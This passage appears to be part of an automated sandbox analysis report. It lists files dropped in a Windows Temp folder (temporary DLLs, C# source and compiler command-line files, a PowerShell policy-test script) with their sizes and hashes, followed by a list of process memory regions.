                            f80fa3c93d91874c8da63e0e67ee8dba9b95e5418695d3e1d57cbc8e1f7c1a260a1d781cc74f220b2f3fb90ddc9e8de2ef4cb8ea6d552c94005cb379d73a8c15

                          • C:\Users\Admin\AppData\Local\Temp\RESE534.tmp

                            Filesize

                            1KB

                            MD5

                            901a6915c56da286cdf4c613d7bea164

                            SHA1

                            de7d1022eac5535f9964805b8c25196a6c87df5a

                            SHA256

                            9fb4915cf9507b8653746556cc0321e6f603021c4586fbedbd86b21ccae8c111

                            SHA512

                            22213429c1ab41f8764a3972ff71505259c2c8a9471e8f8c40ae6099c3254f1a3cd1c41ea61609844ae5a09709c68f8dd78a75591f01351ee232185087c7578b

                          • C:\Users\Admin\AppData\Local\Temp\RESE6DA.tmp

                            Filesize

                            1KB

                            MD5

                            57d469de8a678b3929106a592732d6cf

                            SHA1

                            a63c63e15bdd38dc7cb663071c528d8686a04e01

                            SHA256

                            acbed4621ea96654a8af03aa1f623e9408fba2ee4ee254d88fb645acca3f5c19

                            SHA512

                            1a99a3f74a79d4b99397d3b352605b31be2cbc68bc5db2cc0c0ea0bf5c59cd99525ab73a3e21d6399b204d352418e1c2a3d0ca34d40d928ee4c627f5a09c8d28

                          • C:\Users\Admin\AppData\Local\Temp\RESE89F.tmp

                            Filesize

                            1KB

                            MD5

                            a442317a89b08e6f6d1ae4cba36b5aeb

                            SHA1

                            ef60326704f9ba90e25d376d77be34f81b6cae72

                            SHA256

                            3ffa598d8e264eec004c4ff3d8b4df335d55d7e80cea10e874bab1b279809c48

                            SHA512

                            e84d4a38fffe421461aa323fa549974ac029bb45c7059d9f1332f966ed4be1c18ea44eeb4bd8a6ec478d733186c3dcdcd74529e3902aed8d6af8dc524d96d9df

                          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xckggf3b.l04.ps1

                            Filesize

                            60B

                            MD5

                            d17fe0a3f47be24a6453e9ef58c94641

                            SHA1

                            6ab83620379fc69f80c0242105ddffd7d98d5d9d

                            SHA256

                            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                            SHA512

                            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                          • C:\Users\Admin\AppData\Local\Temp\kmglb5u1\kmglb5u1.dll

                            Filesize

                            3KB

                            MD5

                            e9c8e57f8d71155aac8424a322f7e43a

                            SHA1

                            4a50733b5277cde85d62bb1294a8c601bf3a4809

                            SHA256

                            12ec102b89275e0bac38316d379ce256a371b901ba3bced043f361f96c847d5d

                            SHA512

                            42bb3ae872dd711b2553cd8fdc9d3f5c1a734be68f37ece9de2f1b12861192acbdd337513aad704c15311e6ee3b64e522b08c9034ef0ac500ac2e6ec9accd286

                          • C:\Users\Admin\AppData\Local\Temp\whehlrlz\whehlrlz.dll

                            Filesize

                            3KB

                            MD5

                            d405fdee336baf5de2da8c10ca993dec

                            SHA1

                            b78adfaa797202b94f51cc4b1efca7c1720dff98

                            SHA256

                            d2b815cf59a8ff17d0cf21136c5f489b085f53b5f83d1b2f73b9e68093daee91

                            SHA512

                            6eb0e58cb7e978b320d12c687407f2f67ab9c959df34957dded8384556e0125492810542e22e2d5270b3f546ca3bfc4eb232424f4ddada5b11225e165887151a

                          • C:\Users\Admin\AppData\Local\Temp\wi3clxtk\wi3clxtk.dll

                            Filesize

                            3KB

                            MD5

                            39c030c511ac6b72d8aa7685fcf9669a

                            SHA1

                            ff903a805405aa7eef571548120b7b3558801b10

                            SHA256

                            f658ffb758ed569daa6fd129308ca0c42dce34da5226bc4df184db07c5ec29f0

                            SHA512

                            eae4b77284b2314fc54806684bcaf3aa4774c7a0d3a6b07e9c64a6378e5ab8a84c0662ef9352d514ebd25edba97168cd526ccd3cca5588db7aa79c682bff0281

                          • \??\c:\Users\Admin\AppData\Local\Temp\11inwth0\11inwth0.0.cs

                            Filesize

                            286B

                            MD5

                            b23df8158ffd79f95b9bddd18738270b

                            SHA1

                            79e81bb74bc53671aeabecae224f0f9fe0e3ed7f

                            SHA256

                            856bded4416dd1595613354334ad1d3e5c4922a86102786429bcdb0e7f798882

                            SHA512

                            e23822d5b9a32d7fc705b772ef43bcb336e201ec9c1d2507a530e8b1b383b0727c0b53b92e881a953527e7b2ffb485e24c1161834c9380d1bb7498eac7e4a67f

                          • \??\c:\Users\Admin\AppData\Local\Temp\11inwth0\11inwth0.cmdline

                            Filesize

                            369B

                            MD5

                            076c8159ee8e3e86885fa802d533e841

                            SHA1

                            aa99010f4708648e73e74d6a53cd318d0a3f119e

                            SHA256

                            1e7dc64ad902138466a209d29dbc86aa83ee1446f166fd162565ae1ce02a9ac6

                            SHA512

                            049b7e21696b96bbfdcd784c447e5334f275dda14b91c26edeb1e1647c34cd368dc62cd540824f1934dd014eaa63722fdf29f8d2ae6d1814635d592e1331e084

                          • \??\c:\Users\Admin\AppData\Local\Temp\11inwth0\CSC9671C7C2E4E46FF9B578221C9403AD3.TMP

                            Filesize

                            652B

                            MD5

                            d791e55f5387892562f1782e37900436

                            SHA1

                            671bebec1e8b0c74013a3a71f6009b75591bfc0c

                            SHA256

                            2021249d2bdaf934c37bde6a77065e9b8dc802782d4f24234266e42df17a9772

                            SHA512

                            af0c8c75eb9e00d8a949c9116dd41889ac855884f27b15970edb9a67aefff353f459db1cbcff90d295d2fb5f1881de215d21fe9e19b36c1ce46a4a8820faf121

                          • \??\c:\Users\Admin\AppData\Local\Temp\kmglb5u1\CSCD12D6E32146941EDBE3E2DFB2619B1A0.TMP

                            Filesize

                            652B

                            MD5

                            b2b28956b0475d5aefe9fe7372c83c8b

                            SHA1

                            98443eb9ace41b1fa6bd1f51dca96d96840e3726

                            SHA256

                            4c82038c3070afea647bd58cb0b27938906d2de0bc4414d9ac4cb41ab441beb2

                            SHA512

                            f2df449bee6e6241a1da9e9c8a596b7410c86f550484f79a9d35473089d6a96549be85b16f6b58d09c74960bd38e12d4622df203f10266220e45f4f3d6210679

                          • \??\c:\Users\Admin\AppData\Local\Temp\kmglb5u1\kmglb5u1.0.cs

                            Filesize

                            259B

                            MD5

                            560e1b883a997afcfa3b73d8a5cddbc1

                            SHA1

                            2905f3f296ac3c7d6a020fb61f0819dbea2f1569

                            SHA256

                            e5231270257f1727ca127b669a7c21d46ced81cd5b46e89c48dd8304c1185bea

                            SHA512

                            041dd231b93708d4ad65580ea0fa7cff34a9a43ff8d3ae45b631a381e01dc286607aec05b1aade537818d068ca0b576cac613fde626d60eb2e4e6c3c0f525635

                          • \??\c:\Users\Admin\AppData\Local\Temp\kmglb5u1\kmglb5u1.cmdline

                            Filesize

                            369B

                            MD5

                            2f9bf95fd5fcd793689e515e44f58b9f

                            SHA1

                            6e86c2a7e91b4a827eeb937d53cfc23bc31cd74b

                            SHA256

                            1bd469297578b0b8a94e68dd9cc23e2770eaa3b054f10445a09f75e6adaa8c7a

                            SHA512

                            6c876000f6d0c8494bcaa39dd6e52a43a3b4219aa49ee3b9b643fafdc5cbc736fb57cdd1bffa20c6189f3e1e9ab8bdb5ee1f7dabd6b26df191c88c79e215bc4b

                          • \??\c:\Users\Admin\AppData\Local\Temp\whehlrlz\CSCBB71920A5AC4394BC505E6C6F766021.TMP

                            Filesize

                            652B

                            MD5

                            1fe306f6eaa5be92f796864a91b2b6ce

                            SHA1

                            19857abada832f929d13343bb6df788036768ef1

                            SHA256

                            cc7acc8ba33e0925834a152ef21829bcec4bb6af590f3ee8ebefc6ed68fb3880

                            SHA512

                            323ad18902d58488c36023deea45d6c24f6df1ef46dc964903e4b892d5753f793ba8da380c34b8d67c34e52e324a97042790760bc15f83fe98d8751cf8068638

                          • \??\c:\Users\Admin\AppData\Local\Temp\whehlrlz\whehlrlz.0.cs

                            Filesize

                            249B

                            MD5

                            69ecfeb3e9a8fb7890d114ec056ffd6d

                            SHA1

                            cba5334d2ffe24c60ef793a3f6a7f08067a913db

                            SHA256

                            0a913fd594ad2da3159400fc3d7d2cc50b34f8f31675ec5ac5a41d7e79e9fd58

                            SHA512

                            be7eb5a6a8bcc7f279aee00ad650aa872fc7fc08227eedeb9cc0a4273f0382b91306f60878728eaba3c79fa8c96066b144ecea897360a11be38996f04fdd99e1

                          • \??\c:\Users\Admin\AppData\Local\Temp\whehlrlz\whehlrlz.cmdline

                            Filesize

                            369B

                            MD5

                            8fdd48efb652823a1e741b458414e1ce

                            SHA1

                            67cad48d192ab798b9770ba06a632ace2ab67aac

                            SHA256

                            e52ecd75316cf657555c5a5302e8b14164eec4465c6c858c2fcf2ea44bee86f5

                            SHA512

                            fcdf0436dfa0a971d0ad4521bef87711de83a35fced8fb024b41bcaeb8bbee11cc192a3971fc408988527f3eaa03c4a735e085b5b581e2e269db13e5634b9394

                          • \??\c:\Users\Admin\AppData\Local\Temp\wi3clxtk\CSCBEDB43769F2E43C59B5B63CF7D467EB5.TMP

                            Filesize

                            652B

                            MD5

                            54196b41973a41b7882edc7c6ea9c097

                            SHA1

                            e09d5a6eefbbce98dbe8247510a07c8b2fd3deab

                            SHA256

                            13ea96b53064615f7e87798b630902eecafad64227534bd4395522b6aecb85da

                            SHA512

                            0112ae6a2b9bda1308dc08526a50b0e35b0eb9a9b8dcb2c4224467d51136191a3ae852f02b672897f747613406c21dbb651f8fa1a28ff206df5b729f0feab89f

                          • \??\c:\Users\Admin\AppData\Local\Temp\wi3clxtk\wi3clxtk.0.cs

                            Filesize

                            272B

                            MD5

                            4de985ae7f625fc7a2ff3ace5a46e3c6

                            SHA1

                            935986466ba0b620860f36bf08f08721827771cb

                            SHA256

                            53d5aecb149a00bc9c4fac5feb8e5feddf5c83986c12d5fef1c3ddd104b09004

                            SHA512

                            067916a8d16d322d72901baf3a369be43c99780961ccd306c171bf7ded06e3a13cf69c7fa0cd26c7fa181d87fc0e870f86d274098854a56346ca9272c0b99393

                          • \??\c:\Users\Admin\AppData\Local\Temp\wi3clxtk\wi3clxtk.cmdline

                            Filesize

                            369B

                            MD5

                            386ba9332f83fb33d8fb35726d7497b5

                            SHA1

                            887767625bec24a9f34321e790b04b6c5d0f0d12

                            SHA256

                            27fba45c20d2db089531b2f73cf9bde6545b97f025bf9ed1c61da0f6b73ba6ea

                            SHA512

                            4e003b388ecd298d0213efa58dc6ab3e1790cb16a3ada5babc3d7179ed78ecac69e63751b2aedc515a133a39227aa33c6c3f38ca4cd15d8dae6fab666c043f28

                          • memory/2160-256-0x0000000002A60000-0x0000000002A70000-memory.dmp

                            Filesize

                            64KB

                          • memory/2160-175-0x0000000002A60000-0x0000000002A70000-memory.dmp

                            Filesize

                            64KB

                          • memory/2160-174-0x0000000002A60000-0x0000000002A70000-memory.dmp

                            Filesize

                            64KB

                          • memory/2160-257-0x0000000002A60000-0x0000000002A70000-memory.dmp

                            Filesize

                            64KB

                          • memory/4060-152-0x0000000006BA0000-0x0000000006BBA000-memory.dmp

                            Filesize

                            104KB

                          • memory/4060-138-0x00000000058B0000-0x0000000005916000-memory.dmp

                            Filesize

                            408KB

                          • memory/4060-133-0x0000000002D20000-0x0000000002D56000-memory.dmp

                            Filesize

                            216KB

                          • memory/4060-151-0x0000000006C20000-0x0000000006CB6000-memory.dmp

                            Filesize

                            600KB

                          • memory/4060-150-0x0000000005680000-0x0000000005690000-memory.dmp

                            Filesize

                            64KB

                          • memory/4060-149-0x0000000006700000-0x000000000671E000-memory.dmp

                            Filesize

                            120KB

                          • memory/4060-139-0x0000000005920000-0x0000000005986000-memory.dmp

                            Filesize

                            408KB

                          • memory/4060-153-0x0000000006BF0000-0x0000000006C12000-memory.dmp

                            Filesize

                            136KB

                          • memory/4060-137-0x0000000005810000-0x0000000005832000-memory.dmp

                            Filesize

                            136KB

                          • memory/4060-154-0x0000000007C90000-0x0000000008234000-memory.dmp

                            Filesize

                            5.6MB

                          • memory/4060-155-0x00000000088C0000-0x0000000008F3A000-memory.dmp

                            Filesize

                            6.5MB

                          • memory/4060-136-0x0000000005680000-0x0000000005690000-memory.dmp

                            Filesize

                            64KB

                          • memory/4060-135-0x0000000005680000-0x0000000005690000-memory.dmp

                            Filesize

                            64KB

                          • memory/4060-134-0x0000000005CC0000-0x00000000062E8000-memory.dmp

                            Filesize

                            6.2MB